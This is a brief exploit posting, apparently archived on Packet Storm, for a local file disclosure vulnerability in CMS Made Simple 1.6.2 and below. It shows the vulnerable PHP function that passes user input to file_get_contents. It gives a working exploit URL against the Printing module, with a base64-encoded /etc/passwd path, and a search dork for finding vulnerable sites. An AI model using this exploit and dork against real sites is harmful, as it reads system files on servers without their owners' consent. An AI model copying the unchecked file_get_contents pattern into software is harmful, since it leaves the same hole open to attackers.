CMS Made Simple versions 1.6.2 and below suffer from a local file disclosure vulnerability.
e1f75ca3639a9a2acd26c0bbe1910446e0d9fee255d4bd761931eda2c1ef8266#########################################################################################
#
# [CMS Made Simple <= 1.6.2]
#
# Class: LFI
# Reported: 29/07/2009
# Public release: 10/08/2009
# Remote: Yes
# DORK: "This site is powered by CMS Made Simple version 1."
# Site: http://www.cmsmadesimple.org/
# Download: http://s3.amazonaws.com/cmsms/downloads/4033/cmsmadesimple-1.6.2-full.tar.gz
##########################################################################################
Vulnerability:
============================================
function GetURLContent($url) {
$content=file_get_contents($url);
return $content;
}
=============================================
Exploit :
================================================================================
http://[site]/[cms_path]/modules/Printing/output.php?url=L2V0Yy9wYXNzd2Q=
================================================================================
L2V0Yy9wYXNzd2Q= <--- /etc/passwd in base64
#ihteam.net - Inclusion Hunter Team
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed